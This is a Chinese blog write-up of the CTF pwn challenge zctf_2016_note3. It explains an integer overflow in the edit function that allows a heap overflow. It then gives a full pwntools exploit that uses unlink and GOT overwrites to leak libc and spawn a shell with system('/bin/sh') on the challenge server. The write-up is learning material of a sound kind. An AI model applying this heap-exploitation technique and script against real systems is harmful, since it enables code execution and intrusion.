zctf_2016_note3(整数溢出,unlink)

最新推荐文章于 2022-11-18 16:17:48 发布
最新推荐文章于 2022-11-18 16:17:48 发布
阅读量217 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121176333
版权

zctf_2016_note3:

好像没show?
请添加图片描述

逆向分析:

主界面:
请添加图片描述
add函数:
请添加图片描述

show函数:
show假的
请添加图片描述
edit函数:
请添加图片描述
我们跟进这个函数,
size-1跟一个无符号int作比较,如果size为0的话,就能造成任意大小堆溢出
请添加图片描述
delete函数:
指针释放干净了
请添加图片描述

思路:

我们申请size为0的chunk堆溢出,伪造chunk,触发unlink,改写free的got表为puts,泄露libc
再改写atoi的got为system
再填入/bin/sh

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './zctf_2016_note3'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27822 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
def add(size,content):
        sla('option--->>\n','1')
        sla('length of the note content:(less than 1024)\n',str(size))
        sla('Input the note content:\n',content)
def edit(index,content):
        sla('option--->>\n','3')
        sla('Input the id of the note:\n',str(index))
        sla('Input the new content:',content)
def delete(index):
        sla('option--->>\n','4')
        sla('Input the id of the note:\n',str(index))
#----------------------------------------------------
add(0x0,'a')#0
add(0x30,'a')#1
add(0x80,'a')#2
add(0x20,'a')#3
target=0x6020d0
fd=target-0x18
bk=target-0x10
fake_chunk=p64(0)+p64(0x31)
fake_chunk+=p64(fd)+p64(bk)
fake_chunk+='a'*0x10
fake_chunk+=p64(0x30)+p64(0x90)
edit(0,p64(0)*3+p64(0x41)+fake_chunk)
delete(2)
edit(1,'a'*0x10+p64(elf.got['free'])+p64(elf.got['atoi'])*2)
edit(0,p64(elf.plt['puts'])[:-1])
delete(1)
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['atoi']
print hex(libc_base)
system=libc_base+libc.sym['system']
edit(2,p64(system))
sla('>>\n','/bin/sh\x00')
#debug()        
r.interactive()

其他:

这题折磨死我了orz

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF zctf_2016_note3
doudoudedi
01-13 473
一道典型的unlink题目整形溢出因为i是无符号长整型如果输入-1就会变得巨大实现堆溢出这里应该可以用unlink泄露libc基址然后用fastbin attack打malloc_hook但是这里有多次写入的edit功能就很好做了 先申请4个chunk 然后unlink一个指针到bss段上 unlink的操作fake chunk的fd和bk必须指回自己也就是一个确定的值具体为 `` fake ch...
2016 ZCTF——note3
04-20 269
64位程序,没开PIE  #unlink #整数溢出 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stder...
zctf_2016_note3
z1r0的博客
02-25 169
zctf_2016_note3 查看保护 这里假如size为0的时候,会有一个非常大的溢出(整型溢出)。因为i是unsigned类型,而a2是int类型,比较的时候会溢出。0 - 1 > i 攻击思路:创建一个size为0的堆块时,在edit的时候就可以将下面的堆块进行覆盖。这里笔者采用的是unlink攻击。具体的攻击方法见z1r0’s blog。通过unlink劫持got表。将free_got改为puts_plt这个时候可以泄露libc。再将atoi_got改为system,再传入/bin/sh
zctf_2016_note3 详解
One_p_Two_w的博客
11-04 523
zctf_2016_note3 详解 题目可以在buu上找到,ibc版本为2.23 和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz 查看保护机制 题目分析 是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能 添加note ​ 最多添加七个note,每个note大小在0-0x400之间,申请到的堆空间地址会放在ptr指针处 漏洞在edit功能模块 ​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
unlink zctf 2016 note3
qq_36918532的博客
01-19 2419
这个跟note2很相似,仍然是一个unlink问题,,,不同的是没法打印泄露了 详情请参考,note2 查看检查 在IDA里面看,发现其有增加,修改,删除,打印的功能 其中增加的功能: 发现0x6020c0地方存放的是当前堆ptr,0x6020c0[i+8]存放的是其大小 也就是其布局是这样的:cur_ptr | ptr0 | ptr1 | … | ptr6 | cur_size | size_ptr0 | size_ptr…| size_ptr6 在输入size有个函数sub4009b9()中的sub
ZCTF - 2016 - Reverse100
风靡义磊的博客
07-21 1781
ZCTF2016的第一道逆向
pwn cgctf note3
doudoudedi
11-05 372
好像服务器挂了??这道题是fast bin存在uaf漏洞申请3个unsort bin堆块释放一个打印得到libc的基址算出one_gadget然后再释放改变第二个堆块的fd指针为malloc_hook-0x23在申请一个大小相同的堆块,在第三块堆块写入one_gagdet,再次申请堆块出发one_gadget,额本地拿不到~~ from pwn import * #p=process('./not...
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 583
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
ZCTF2017 WEB Writeup
Bendawang's Blog
02-27 3761
ZCTF2017 WEB Writeup
CTF之堆溢出-unlink原理探究
热门推荐
BadRer的博客
06-12 1万+
来干!来干! 转战堆溢出,这东东确实接触的很少,听说很神奇很细腻。我也是初次接触就和大家一起共同学习下,也填补下这方面的空白。 https://sploitfun.wordpress.com/2015/02/26/heap-overflow-using-unlink/ 这篇文章讲的就是堆溢出的原理,不过全是英文,估计。。。慢慢看,不急。我就结合着它给的示例程序来分析下原理,以及如何利用堆溢出
从一道CTF题看整数溢出
csd_ct的专栏
06-07 1540
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.csdn.net/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3190
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2743
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
2022NewStarCTF pwn大部分题解
最新发布
m0_51251108的博客
11-18 1729
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1713
做arm架构下的pwn题某个报错
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1150
CISCN2021pwn pwny(数组越界,劫持exit_hook)
house of cat 学习
m0_51251108的博客
10-13 1146
house of cat的利用链学习
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1050
浙江省第五届大学生网络与信息安全竞赛预赛pwn

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值